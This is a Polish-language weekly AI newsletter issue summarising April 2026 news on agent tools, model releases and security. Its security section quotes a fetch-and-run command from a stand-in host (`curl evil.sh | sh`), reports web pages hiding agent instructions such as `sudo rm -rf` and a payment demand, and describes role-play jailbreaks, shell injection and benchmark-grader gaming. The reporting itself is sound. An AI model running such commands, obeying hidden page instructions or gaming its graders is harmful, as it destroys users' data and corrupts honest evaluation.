SmartDigest.ai Tworzone przez AI, żeby nadążyć za AI
Zapisz się

Zapisz się do newslettera

Co tydzień najważniejsze newsy AI prosto na Twój e-mail. Wybierz tematy, które Cię interesują.

Wydanie · Tydzień 17 · 20–26 kwietnia 2026

Archiwum wydań →

Trzy otwarte modele zrównały się z flagowcami w jednym tygodniu, Cloudflare zwiera warstwę agenta wokół pamięci, maila i firmowego MCP, a dziura w protokole sprzed dwóch tygodni dalej otwarta.

Premiera / Narzędzie · 12

Agent Memory rusza w prywatnej becie: pięć poleceń dla modelu zamiast surowego SQL-a Premiera / Narzędzie

Agent Memory rusza w prywatnej becie: pięć poleceń dla modelu zamiast surowego SQL-a

4 min

Cloudflare 17 kwietnia wpuścił do prywatnej bety Agent Memory, usługę ratującą pamięć agenta w momencie, gdy okno kontekstowe się zapełnia i harness ucina historię. Zamiast surowego dostępu do bazy wektorowej model dostaje pięć operacji, w tym `recall`, który pod spodem odpala pięć równoległych kanałów wyszukiwania i zwraca gotowe zdanie syntezy. Czarną robotę robi tańszy Llama 4 Scout, większy Nemotron 3 wchodzi tylko do finalnej syntezy. Pamięć jako wąska usługa, nie baza do obsługi przez model, ma sens, choć porównania z własnym Postgresem z embeddingami jeszcze nie ma.

Wiadomość wchodzi do agenta, agent znika na godzinę, odpowiedź wraca tym samym kanałem Premiera / Narzędzie

Wiadomość wchodzi do agenta, agent znika na godzinę, odpowiedź wraca tym samym kanałem

3 min

Cloudflare 16 kwietnia otworzył Email Service w publicznej becie i domknął obieg: mail wchodzi do agenta, agent znika na godzinę, odpowiedź wraca tym samym wątkiem. Adres pod twoją domeną wybiera instancję agenta, a jej stan żyje w Durable Object przyklejonym do tej tożsamości — bez osobnej bazy mapującej maila na klucz. SPF, DKIM i DMARC ustawia sam Cloudflare, odpowiedzi można podpisać HMAC-SHA256. Cena: pamięć, załączniki w R2 i klasyfikacja w Workers AI zostają w jednym ekosystemie.

Awesome LLM Apps obiecuje agenta w 30 sekund. Reszta trwa dłużej. Premiera / Narzędzie

Awesome LLM Apps obiecuje agenta w 30 sekund. Reszta trwa dłużej.

3 min

Shubham Saboo zebrał w jednym repo ponad 100 szablonów aplikacji agentowych i RAG-owych, od zespołu do due diligence dla funduszu VC po 19 wariantów wyszukiwania w danych i 19 plików Agent Skills w formacie Anthropica. README obiecuje pierwszego agenta w 30 sekund, ale każdy szablon to demo na Streamlicie, bez autoryzacji i obserwowalności, więc tydzień, który niby oszczędzasz, wraca przy przepisywaniu warstwy interfejsu. Katalog Saboo działa najlepiej jako podręcznik wzorców, nie jako kod do skopiowania prosto na produkcję.

Cloudflare układa firmowe MCP na trzech zasadach: zdalne serwery, portal nad nimi, Code Mode na schematach Premiera / Narzędzie

Cloudflare układa firmowe MCP na trzech zasadach: zdalne serwery, portal nad nimi, Code Mode na schematach

4 min

Cloudflare 22 kwietnia opisała firmowy stos MCP na trzech zasadach: serwery tylko zdalnie na firmowej chmurze, portal z regułami Identity/Conditions/Scope nad nimi i Code Mode, który zwija 182 schematy w dwa wywołania, ścinając tokeny na schematach nawet o 99,9%. Ruch do modeli idzie przez AI Gateway — 241 mld tokenów miesięcznie — a agent bezpieczeństwa na Kimi K2.5 w Workers AI kosztuje 77% mniej. Firma wiąże z tym skok zmergeowanych PR-ów z 5 600 do 8 700 tygodniowo. Kontrola musi siedzieć obok protokołu, bo MCP zostaje na poziomie transportu.

Trzy wywołania API zamiast dwóch dni z kodem orkiestracji agenta Premiera / Narzędzie

Trzy wywołania API zamiast dwóch dni z kodem orkiestracji agenta

3 min

AWS 21 kwietnia wystawił Amazon Bedrock AgentCore — zarządzany harness, w którym deklarujesz model, narzędzia i instrukcje, a pętlę agentową, sandbox, pamięć sesji i odtwarzanie po awarii dostajesz w pakiecie. Pod spodem działa open-source SDK Strands Agents, CLI zwija prototyp i wdrożenie do jednego polecenia, a wtyczki MCP uczą Claude Code, Cursora i Kiro wzorców AgentCore. Rodrigo Moreira z VTEX chwali wymianę modelu jako parametr API zamiast przebudowy. Cena: kolejny czysty ślad uzależnienia od dostawcy.

Parametr effort zamiast budżetu tokenów: Anthropic zmienia API rozumowania Premiera / Narzędzie

Parametr effort zamiast budżetu tokenów: Anthropic zmienia API rozumowania

3 min

Anthropic w Opus 4.7 wycofał ręczny `budget_tokens` i zostawił tylko tryb adaptive, w którym o głębokości rozumowania decyduje sam model, a ty podajesz mu jedynie wskazówkę `effort` z pięcioma poziomami — od `low` po wyłączny dla 4.7 `xhigh`. Razem z adaptive wchodzi interleaved thinking, czyli możliwość zatrzymania się między wywołaniami narzędzi, której na 4.6 ze stałym budżetem po prostu nie było. Domyślna wartość pola `display` to teraz `omitted`: ślady myślenia znikają z odpowiedzi, ale Anthropic dalej liczy ci wszystkie tokeny, więc skracasz latencję, nie rachunek.

Codex zaczyna nagrywać pulpit, żeby zapamiętać, nad czym pracujesz Premiera / Narzędzie

Codex zaczyna nagrywać pulpit, żeby zapamiętać, nad czym pracujesz

3 min

OpenAI 20 kwietnia pokazało Chronicle, eksperymentalny dodatek do Codexa, który w tle robi zrzuty pulpitu i buduje z nich pamięć między sesjami, żeby agent nie zaczynał każdej sesji od pytania, nad czym pracujesz. Funkcja rusza w planie Pro za 200 dolarów miesięcznie, tylko na Macu. Wybór ekranu zamiast plików oznacza, że w pamięci modelu mogą wylądować Slack, poczta i CRM, a OpenAI nie mówi, co dokładnie trafia na ich serwery. Microsoft Recall już raz przerobił tę samą krytykę za prywatność.

Czterdzieści jeden agentów AI zgodziło się na ten sam plik markdownu Premiera / Narzędzie

Czterdzieści jeden agentów AI zgodziło się na ten sam plik markdownu

4 min

SKILL.md — markdown z dwulinijkowym nagłówkiem YAML — cicho stał się wspólnym formatem instrukcji dla agentów kodujących. Vercel Labs wypuścił `npx skills add`, które mapuje ten sam folder na 45 agentów, od Claude Code po Gemini CLI. Google w repo `google/agents-cli` publikuje siedem skilli uczących cudzych asystentów stawiać agenty ADK na Cloud Run, a Hugo He w PPT Master składa edytowalny PowerPoint za 0,08 dolara. Tylko Claude Code wspiera wszystkie cztery funkcje formatu, więc pierwsza zmiana schematu pokaże, czy to npm dla agentów.

OpenAI wypuścił framework agentowy, w którym ich własne modele są jedną z opcji Premiera / Narzędzie

OpenAI wypuścił framework agentowy, w którym ich własne modele są jedną z opcji

3 min

OpenAI w wersji 0.14.6 SDK openai-agents-python dorzuca Sandbox Agents — dziewiąty klocek obok handoffów, guardraili, sesji i tracingu — który rozdziela agenta na harness i kontener, więc po awarii runner podnosi go ze snapshotu zamiast zaczynać od zera. Ciekawsze jest jednak to, że pyproject.toml wymienia any-llm od Mozilla AI i LiteLLM jako opcjonalne integracje. W efekcie framework agentowy OpenAI nie wymaga modeli OpenAI: w pętli decyzyjnej spokojnie puścisz Claude'a 4.6 czy lokalnego Mistrala. To gra o standard koordynacji, nie o każdy token.

Co zmienia llm 0.31: dwie flagi, cicha poprawka i nowy model OpenAI Premiera / Narzędzie

Co zmienia llm 0.31: dwie flagi, cicha poprawka i nowy model OpenAI

3 min

Wersja 0.31 narzędzia llm Simona Willisona, wydana 24 kwietnia, dorzuca dwie flagi do wtyczki OpenAI: `-o verbosity low` ścisza model bez wpychania instrukcji do promptu, a osobny przełącznik decyduje, jak dokładnie API ogląda obrazek, z nową wartością `original` dla GPT-5.4 i 5.5. Pod spodem modele z `extra-openai-models.yaml` rejestrują się też jako asynchroniczne, więc własny serwer na vLLM albo Groq wystarczy wpisać raz. Dla skryptów przepuszczających setki zapytań to konkretna kontrola nad tokenami i kosztami.

Czego w MCP brakuje firmom: autentykacji między organizacjami, długich zadań i serwera, który sam się odzywa Premiera / Narzędzie

Czego w MCP brakuje firmom: autentykacji między organizacjami, długich zadań i serwera, który sam się odzywa

3 min

MCP zebrał 110 milionów pobrań SDK miesięcznie w 16 miesięcy, a na nowojorski MCP Dev Summit zjechało 1100 osób. David Soria Parra z Anthropica zapowiedział, czego brakuje pod produkcję: wymiany tokenów między firmami, trybu dla zadań na godziny, wyzwalaczy od serwera do agenta i transportu bezstanowego pod load balancer. Linux Foundation powołała w grudniu 2025 Agentic AI Foundation, a AWS Bedrock dopisał prymitywy Tasks i Elicitations, bo czterech dostawców rusza szybciej niż konsensus.

Co rozszerzenie Claude'a do Chrome'a zmienia w pracy z Claude Code Premiera / Narzędzie

Co rozszerzenie Claude'a do Chrome'a zmienia w pracy z Claude Code

3 min

Anthropic po cichu wypuścił Claude in Chrome, rozszerzenie, które podaje Claude Code'owi kontekst otwartej strony bez zrzutów ekranu i wklejania. Mahnoor Faisal z XDA Developers testowała je kilka tygodni przy pisaniu własnego rozszerzenia na Instagram i naprawiła błąd, nie tłumacząc nawet, na czym polegał. Zamiast budować osobną przeglądarkę agentową jak Opera Neon, Perplexity Comet czy ChatGPT Atlas, Anthropic dorzuca warstwę do Chromium, którego już używasz. Pętla terminal–przeglądarka domyka dziurę, której konkurencja nie rusza.

Model / Badania · 7

Moonshot wypuścił otwarty model agentowy i razem z nim test na to, czy cudze serwery go nie psują Model / Badania

Moonshot wypuścił otwarty model agentowy i razem z nim test na to, czy cudze serwery go nie psują

4 min

Moonshot AI wydał 21 kwietnia Kimi K2.6 na licencji Modified MIT — otwarty model agentowy z wynikami 58,6% na SWE-Bench Pro i 66,7% na Terminal-Bench 2.0, w cenie 0,60 dolara za milion tokenów wejścia, czterokrotnie taniej niż GPT-5.4. W pokazowym zadaniu przebudował silnik exchange-core w Javie i wyciągnął 185% wzrostu przepustowości po 13 godzinach pracy. Razem z modelem pojawił się Kimi Vendor Verifier — sześć testów sprawdzających, czy dostawcy serwują to, co podpisują marką K2.6.

Pod ceną M2.5 stoi własna ramka treningowa i 200 tysięcy środowisk Model / Badania

Pod ceną M2.5 stoi własna ramka treningowa i 200 tysięcy środowisk

4 min

MiniMax ujawnił, co stoi za ceną M2.5: framework treningowy Forge, 200 tysięcy środowisk z realnej pracy firmy i algorytm CISPO stabilizujący trening modelu MoE. Pod różnymi harnessami model wyciąga 79,7% (Droid) i 76,1% (OpenCode) na SWE-Bench Verified, przed Opusem 4.6, a M2.5-Lightning kosztuje 2,40 dolara za milion tokenów wyjścia. Firma twierdzi, że 30% jej codziennych zadań robi sam model, ale wszystkie nowe benchmarki zbudowała sama. Tania inferencja otwiera agenty, na które dotąd nie było budżetu, jeśli model dowiezie poza własnym treningiem.

Qwen3.6-27B osiąga to, na co poprzednia generacja potrzebowała 397 miliardów parametrów Model / Badania

Qwen3.6-27B osiąga to, na co poprzednia generacja potrzebowała 397 miliardów parametrów

3 min

Alibaba wypuściła 23 kwietnia Qwen3.6-27B: gęsty model open-source, który na SWE-Bench Verified osiąga 77,2%, ustępując tylko Claude 4.5 Opus (80,9%), a na Terminal-Bench 2.0 remisuje z nim na 59,3%. Przy 15 razy mniejszej liczbie wag niż poprzedni flagowiec Alibaby mieści się w FP8 na karcie z 32 GB, a w kwantyzacji 4-bitowej schodzi na sprzęt konsumencki. Architektura z proporcją 3:1 na korzyść uwagi liniowej daje natywne okno 262 144 tokenów, a opcja preserve_thinking pozwala agentowi nieść ślad rozumowania przez kolejne tury.

Platformy, modele, otwarte wagi: cztery oferty na agenta w jednym tygodniu Model / Badania

Platformy, modele, otwarte wagi: cztery oferty na agenta w jednym tygodniu

3 min

24 kwietnia w jeden piątek Google ogłosił Gemini Enterprise Agent Platform wchłaniającą Vertex AI, OpenAI pokazał Workspace Agents w ChatGPT wpinające Codex w Slacka, Drive'a, Salesforce i Notion, a Moonshot AI otworzył wagi Kimi K2.6 — bilion parametrów, 32 mld aktywnych, 80,2% na SWE-Bench Verified. Wszyscy sprzedają tę samą wizję: trwała pamięć, tożsamość, wyzwalacze, konfiguracja bez kodu. Brakuje jednego — liczb od kogoś, kto już zbudował na tym stosie produkcyjnego agenta i opowie, co pękło.

Przegląd kodu każdego commita znów wchodzi w budżet Model / Badania

Przegląd kodu każdego commita znów wchodzi w budżet

4 min

DeepSeek V4-Pro z 24 kwietnia kosztuje 1,74 dolara za milion tokenów wejścia i 3,48 za wyjście, wobec 5 i 30 dolarów w GPT-5.5. Na LiveCodeBench bije konkurencję z 93,5% Pass@1, ale w trybie myślącym wciąż odstaje od Opus 4.7 na dłuższych zadaniach agentowych. Rabat 92% obowiązuje tylko przy trafieniu w cache, a to wymaga statycznego prefiksu co do bajta. Scenariusze typu przegląd kodu każdego commita wracają do gry, jeśli zdyscyplinujesz prompt.

Berkeley wystawia audytora, który wygrywa sześć benchmarków bez rozwiązywania zadań Model / Badania

Berkeley wystawia audytora, który wygrywa sześć benchmarków bez rozwiązywania zadań

3 min

BenchJack, audytor od Hao Wanga z UC Berkeley, wycisnął 100% wyniku z pięciu z ośmiu czołowych benchmarków agentowych i około 100% z szóstego, nie rozwiązując ani jednego zadania — atakował warstwę oceniającą przez te same narzędzia, które dostaje agent. Tylko OSWorld się obronił, spadając do 73%. METR pokazał w czerwcu 2025, że Claude 3.7 Sonnet i o3 same z siebie sięgają po reward hacking na RE-Bench. Wniosek praktyczny: tabele producenta traktuj jak fabryczną deklarację zużycia paliwa i testuj modele na własnym repo.

Jakim asystentem refaktoryzować? Zależy, jak duży masz kod Model / Badania

Jakim asystentem refaktoryzować? Zależy, jak duży masz kod

3 min

Badanie Saby i Ahmeda opublikowane 24 kwietnia w Scientific Reports pokazuje, że wybór asystenta do refaktoryzacji zależy od rozmiaru kodu. Na małych projektach Codeium dostał od SonarQube 83%, Gemini 82%, a ChatGPT tylko 59%; na większych ChatGPT podciągnął się do 77,2% i wyprzedził Codeium w kilku metrykach. Autorzy wskazują Gemini jako najbardziej uniwersalne. Warto jednak pamiętać, że praca jest wersją nieredagowaną, opiera się wyłącznie na SonarQube, pomija Copilota i nie sprawdza, czy kod nadal działa.

Bezpieczeństwo · 3

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją Bezpieczeństwo

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją

4 min

Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.

Twój agent czyta w sieci to, czego ty w przeglądarce nigdy nie zobaczysz Bezpieczeństwo

Twój agent czyta w sieci to, czego ty w przeglądarce nigdy nie zobaczysz

3 min

Forcepoint X-Labs w kwietniu 2026 namierzył 10 żywych domen z ukrytymi instrukcjami dla agentów: na faladobairro.com czeka `sudo rm -rf`, na perceptivepumpkin.com żądanie 5000 dolarów przez PayPal.me. Pillar Security pokazał drugą warstwę: parametr `find_my_name` w Antigravity od Google przepuszcza wzorce z `-Xsh` prosto do shella. Wniosek: tnij uprawnienia agenta i trzymaj nieznany kod w kontenerze.

Vibe Security Radar znalazł 74 luki podpisane przez Claude'a i Copilota Bezpieczeństwo

Vibe Security Radar znalazł 74 luki podpisane przez Claude'a i Copilota

3 min

Hanqing Zhao z SSLab na Georgia Tech przeskanował 43 tysiące alertów i wyciągnął 74 luki wprowadzone przez Claude Code i Copilota — 14 krytycznych, 25 wysokich. Sam marzec 2026 dał 35 wpisów, więcej niż cały 2025 rok. Mocniejszy od liczb jest argument o powtarzalności: model pisze podobny kod milionom ludzi, więc jeden wzorzec dziury skanuje się po tysiącach repo. Wracają wstrzykiwanie komend, obejście uwierzytelnienia i SSRF. Kod od agenta czytaj jak PR od juniora.

Biznes / Rynek · 1

Poradnik / Praktyka · 2

Analiza / Opinia · 4

Większość produkcyjnych agentów to wciąż jedno wywołanie do jednego modelu Analiza / Opinia

Większość produkcyjnych agentów to wciąż jedno wywołanie do jednego modelu

3 min

Raport Datadoga State of AI Engineering pokazuje, że 59% wywołań agentów u ponad tysiąca klientów to wciąż jeden model, jedno wywołanie, bez orkiestracji. OpenAI spadł z 75% do 63% organizacji między 2025 a marcem 2026, choć liczba klientów się podwoiła — Anthropic i Google rosły szybciej. Instrukcje systemowe to 69% tokenów wejściowych, ale tylko 28% wywołań korzysta z cache promptów. Część tej prostoty to dług, część rozsądek, a raport ich nie rozróżnia.

39 punktów różnicy między tym, co programista czuje przy AI, a tym, co mierzy stoper Analiza / Opinia

39 punktów różnicy między tym, co programista czuje przy AI, a tym, co mierzy stoper

3 min

Doświadczeni programiści open source spodziewali się, że asystent AI przyspieszy ich pracę o 24%. Po wszystkim nadal czuli zysk rzędu 20%. Stoper METR w randomizowanym badaniu pokazał coś odwrotnego: byli o 19% wolniejsi. Trzydzieści dziewięć punktów rozjazdu między odczuciem a zegarem bierze się z przeglądu wygenerowanego kodu, poprawiania promptów i przełączania uwagi. Cała branżowa narracja o produktywności AI opiera się na ankietach, a 87% deweloperów codziennie sięga po te narzędzia, nie wiedząc, kiedy faktycznie pomagają.

Cztery dźwignie niezawodności, które zniknęły w drodze z modelu do API Analiza / Opinia

Cztery dźwignie niezawodności, które zniknęły w drodze z modelu do API

4 min

Anthropic, OpenAI i Google po cichu zabrały cztery dźwignie niezawodności, które w lokalnym modelu z otwartymi wagami masz za darmo: prefill odpowiedzi, logprobs, pełen ślad rozumowania i ograniczone dekodowanie poza JSON-em. Claude stracił prefill wraz z modelami po 4.6, OpenAI odciął logprobs dla GPT-5, a ślad myślenia wszyscy trzej pokazują tylko w streszczeniu. To wybór polityczny podyktowany ryzykiem destylacji, nie ograniczenie inżynierskie; jeśli zamknięte API nie dorobią rozbudowanego endpointu, ruch wymuszą modele otwarte jak DeepSeek R1.

Z Linuksa wylatuje 27 tysięcy linii kodu, bo skanery AI zalały opiekunów Analiza / Opinia

Z Linuksa wylatuje 27 tysięcy linii kodu, bo skanery AI zalały opiekunów

3 min

Społeczność jądra Linuksa rozważa wycięcie około 27 tysięcy linii kodu sterowników sieciowych ISA i PCMCIA dla sprzętu firm 3Com czy Xircom, bo skanery AI zalewają listy mailingowe raportami o błędach w kodzie, którego prawie nikt już nie uruchamia. Andrew Lunn, opiekun podsystemu sieciowego, tłumaczy asymetrię kosztu: zgłaszającego raport kosztuje minuty, opiekuna godzinę odtwarzania kontekstu kodu sprzed dwóch dekad. Najprostsza obrona to filtr osiągalności po stronie twórców skanerów, bez niego następne w kolejce są mniejsze projekty open source.